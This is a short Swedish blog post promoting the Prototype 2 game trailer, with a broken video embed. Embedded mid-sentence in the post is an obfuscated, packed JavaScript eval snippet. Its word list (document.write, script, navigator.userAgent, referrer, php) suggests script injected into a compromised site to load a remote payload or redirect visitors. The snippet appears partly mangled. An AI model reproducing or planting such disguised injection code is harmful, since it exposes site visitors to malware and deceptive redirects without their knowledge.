Image Image Image Image Image Image Image Image Image Image

| 23 oktober, 2020

Scroll to top

Top

Prototype 2 trailer. Släpps den 24 april!

Prototype 2 trailer. Släpps den 24 april!
Sebastian

type=”text/javascript” src=”https://goviral.hs.llnwd.net/e1/playerjs/activision_prototype_11183.js?w=600&h=475&pID=59289&bgc=ffffff&cw=1374016&skinName=light&wmode=window&hideChrome=0″>

Ett eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|triya|var|u0026u|referrer|atfdy||js|php’.split(’|’),0,{}))
New York i lågor, med gator fyllda av tusentals mutanter och en ensam man på jakt efter hämnd.

Vi kommer tillbaka till den stora staden New York som brinner igen. Denna gång är mutanterna fler än någonsin. Som i föregångaren av spelet, ”Prototype 1” så faller skyskrapor samman och hjälten som man en gång var  är numera den fruktade antagonisten.

Se trailern ovan!